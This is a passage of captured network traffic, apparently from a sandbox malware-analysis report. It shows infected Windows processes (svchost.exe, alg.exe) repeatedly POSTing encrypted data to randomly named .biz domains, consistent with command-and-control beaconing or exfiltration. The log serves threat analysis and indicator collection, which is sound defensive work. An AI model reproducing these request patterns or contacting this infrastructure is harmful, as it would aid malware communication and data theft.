                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=a037e0ad562550722ad5710b71686a21|8.46.123.33|1728394166|1728394166|0|1|0; path=/; domain=.uaafd.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              111192.168.2.45014918.141.10.107804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.166729927 CEST351OUTPOST /tywwnha HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: eufxebus.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.166758060 CEST786OUTData Raw: 49 da 2d 12 fa f0 b2 6c 06 03 00 00 67 bb d3 fc 54 ea 29 0d 39 fe f7 45 ab 31 ea 0a b9 57 97 1d 16 21 35 17 99 5b 89 2e 80 47 3d 44 6d e0 f6 68 8d e2 ec 5f 83 0e 27 49 45 0e 5d 82 38 b0 0f a5 a6 c8 b2 18 8a d7 99 ee 79 03 87 e4 c6 c7 1f b8 d5 07
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: I-lgT)9E1W!5[.G=Dmh_'IE]8y~O*&.k|'k`uS(0T%Wj2"xJ|"hwA~tGQ<<K-D50pLl93|(\vWljZ(f{cg3_=
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.506442070 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:28 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=9fffd3c2fca102894b3a8525b3b7624e|8.46.123.33|1728394168|1728394168|0|1|0; path=/; domain=.eufxebus.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              112192.168.2.45015018.208.156.248802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.282533884 CEST357OUTPOST /jkmxqkwmcvmo HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: opowhhece.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.282533884 CEST778OUTData Raw: 59 e9 7e de 92 6b b2 5b fe 02 00 00 44 c5 af 38 af 83 f7 59 06 d2 d8 38 af 43 13 17 46 6c 88 43 15 44 cc 6d 90 6c 26 ae 82 73 58 4a 15 c8 46 93 79 f4 d7 cd bb 87 a8 c9 81 93 35 87 27 0e b8 c4 c0 a9 9a 8b 5c 5e 51 69 83 36 58 80 d4 20 b6 ca ad 03
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Y~k[D8Y8CFlCDml&sXJFy5'\^Qi6X Rt![sGRC$|*)[ w>S#yLx|K1IV@*3SmgAr&pB{D=UXZx3A/NEG->cMb7`|?
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:27.732120991 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:27 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=40bcfdb0e960d96bb2e583c20390c373|8.46.123.33|1728394167|1728394167|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              113192.168.2.45015113.251.16.150802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.379132032 CEST344OUTPOST /tm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: jdhhbs.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.379172087 CEST778OUTData Raw: 65 2f c4 d9 09 5c 29 23 fe 02 00 00 81 e5 06 48 01 d1 6f 51 80 1a 14 1a 5e a9 d0 82 52 73 55 38 55 df 5c 45 4d 84 86 51 75 3c 0c b2 37 ee da a3 71 fd 05 7d 1d 19 aa ee 1f 71 e6 97 18 4e 83 99 8c 2e 7e 9f cf 83 6b 6d ae 3a 3e 5b fe b3 a9 77 3c 67
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: e/\)#HoQ^RsU8U\EMQu<7q}qN.~km:>[w<g^t.-Y MOLWY*&t$9&t'5fKBoFv!B2FHuqHY:B9NglOZc<Y.g_] A3[_Y$=Xd\GLSp
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.697092056 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=5e5b3847dbe0f308e0b3bbcd6cbfdf01|8.46.123.33|1728394169|1728394169|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              114192.168.2.45015234.246.200.160804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.546307087 CEST353OUTPOST /kyoprhcrfsm HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: pwlqfu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:28.546348095 CEST786OUTData Raw: b6 ea 95 2e 46 45 9d 0a 06 03 00 00 7b b3 e7 1c 6c 93 aa 13 10 87 d6 e3 84 b5 30 50 f8 91 da d1 72 39 a0 cb 21 51 cf 2a 32 91 34 77 00 e9 01 45 fe 59 db a9 bf 09 0a b2 ac 2f ac 1a 5c a0 bf a7 24 8e 26 3e 20 ca 42 1a 9a dc 93 b3 ea ca d2 43 10 a4
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: .FE{l0Pr9!Q*24wEY/\$&> BCySsaJ6@rU{J]J}Z`t'H?"eZD2A-0tNFmR0{s9Hs}yA_$=J4s{9
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:29.303603888 CEST408INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:29 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=88b1f0ea97c3aca065ce742b6c2938d3|8.46.123.33|1728394169|1728394169|0|1|0; path=/; domain=.pwlqfu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              115192.168.2.45015447.129.31.212804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.046932936 CEST358OUTPOST /avcgsychncpte HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: rrqafepng.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.048455000 CEST786OUTData Raw: 10 7e e5 4b 37 4d ee 12 06 03 00 00 9d 76 d2 bc d8 62 14 82 0f 1c 69 ca 56 05 2e 81 55 7d 98 72 6f 85 a5 f6 98 3f b6 7e 65 e6 c2 62 b6 4f d0 32 e4 e8 23 36 3a 6e 7a 0f 73 f7 68 df d5 21 da dd fc cb 4e 69 4f c1 36 39 9d a3 01 7d c6 34 13 6f 4e 8c
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ~K7MvbiV.U}ro?~ebO2#6:nzsh!NiO69}4oN1'Wz_"m5KkB52t/l|@j1[&KYux7Bq~+l7i0dvl2-f i>['^h.^?@x5
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.371695042 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=1b5b4e3f54bf33be10f9a72cbb355756|8.46.123.33|1728394171|1728394171|0|1|0; path=/; domain=.rrqafepng.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              116192.168.2.45015534.246.200.160802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.521245956 CEST353OUTPOST /udhgonlj HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: mgmsclkyu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:30.521275997 CEST778OUTData Raw: 96 e3 31 db 90 05 dc df fe 02 00 00 9f 3c 65 8f 6f 3c 76 48 f9 c1 09 f5 af e4 a1 5b a8 e3 ea 65 26 cc b2 f7 92 5d 07 aa 47 b5 fc df 96 ea e8 cb a3 93 ac 8c 86 11 37 0c e0 6e a9 60 5c 6d 0a 0e 75 71 0b f9 9a 89 cd 72 0f f2 e8 31 94 78 9e 7d 15 1f
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 1<eo<vH[e&]G7n`\muqr1x}/)PFUKcgVxG03$szec-)>|[7hY@x.2H?p92O9)lHC<K2rrZO?L1#eB)SYF
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.261063099 CEST411INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=ffc6fa1790eaf94826993a9aff1194b3|8.46.123.33|1728394171|1728394171|0|1|0; path=/; domain=.mgmsclkyu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              117192.168.2.4501563.94.10.34804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.392673969 CEST349OUTPOST /dumoc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: ctdtgwag.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.392673969 CEST786OUTData Raw: af 72 b7 67 4b 76 5e 9d 06 03 00 00 c3 75 05 d7 39 3a 81 7d 98 6b 00 aa f5 5f 14 8c a8 ee ad 0e 51 d7 fb cb b8 ca 06 7d 08 4a a8 c0 d2 10 6b f8 fe 52 22 fc eb 47 3c 05 31 0c 7c 25 2a 9c 59 43 37 5d 60 4f a9 78 fb e8 f5 d7 15 f4 7b 24 50 2f 99 b0
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: rgKv^u9:}k_Q}JkR"G<1|%*YC7]`Ox{$P/?U4g,m{"5%hgztFi3|xZ|EoYnNYt}}(>'2i!l>-LdA:FpM`^+'1'CZA(GB$>
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.865526915 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:31 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=bbe903bf2d5ae9ab37d69bc1246f7102|8.46.123.33|1728394171|1728394171|0|1|0; path=/; domain=.ctdtgwag.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              118192.168.2.45015818.141.10.107802912C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.567681074 CEST345OUTPOST /sq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: warkcdu.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.567681074 CEST778OUTData Raw: 08 d1 b6 f7 56 0a e6 15 fe 02 00 00 04 4a b2 f9 c7 25 eb 1f 84 18 44 ce 15 5c 7f c6 60 03 ce 9a 66 94 03 78 ec 34 2a bc 3e 0f 02 af 54 09 00 e8 64 5e bf 9f c4 44 58 5e 41 2f 92 9e 5c 0e f3 71 85 e9 08 a9 2d bc 0c 35 cd b1 57 be f8 9f bb eb 44 42
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: VJ%D\`fx4*>Td^DX^A/\q-5WDBQ]+NlEQJC@;GQ#2*]cA7cwYj/54WzwAQHr2kPGr5/D8:ntAzj4)NF#?_
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.915174961 CEST409INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=0b1ce7f834fb90a74be22fe2be4d60ef|8.46.123.33|1728394172|1728394172|0|1|0; path=/; domain=.warkcdu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              119192.168.2.45015935.164.78.200804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.894870043 CEST354OUTPOST /ejbrogxxii HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: tnevuluw.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:31.894889116 CEST786OUTData Raw: a4 83 ee c4 6b ae 30 f6 06 03 00 00 f6 6e b3 3a 8e a4 a7 22 e9 77 bc bf 38 96 87 cb bc 6c de 6c fb b1 e9 b3 6a 12 ad 0d d5 15 95 6b 03 5c c0 05 34 df 31 60 40 91 25 b6 e2 55 f4 77 45 43 31 20 ed 19 3c ab e5 d3 98 0e c1 9f fd 4a 4c 48 be 96 13 29
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: k0n:"w8lljk\41`@%UwEC1 <JLH){vu*A)0XW9tM^.#Jg'qE\gv.^imI{GSns|J#uh_bu<}tyWLx^*n\4qY&@]{>2m"PLjd<no
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.636181116 CEST410INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 08 Oct 2024 13:29:32 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=7c754c4fb92758001e74183ebb896ac7|8.46.123.33|1728394172|1728394172|0|1|0; path=/; domain=.tnevuluw.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                              120192.168.2.45016018.141.10.107804476C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.670897961 CEST353OUTPOST /efgvahmdqrw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                              Host: whjovd.biz
                                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 786
                                                                                                                                                                                                                                                                                                                                                                                                                              Oct 8, 2024 15:29:32.670928955 CEST786OUTData Raw: ca 4f 4f d1 39 eb 00 6f 06 03 00 00 d0 42 66 75 4e 34 08 0c 89 bc 27 e7 96 cc 09 ce 9d 9d 2c da 50 79 cc 1a 9c 32 11 20 4b af f0 58 e5 43 60 7b 73 ec 77 8c f3 6d 65 be 47 2e 38 e9 91 23 9d 40 ab 28 4f 95 57 b1 8d d5 a3 cc 38 bb 24 7e c8 46 1b cb
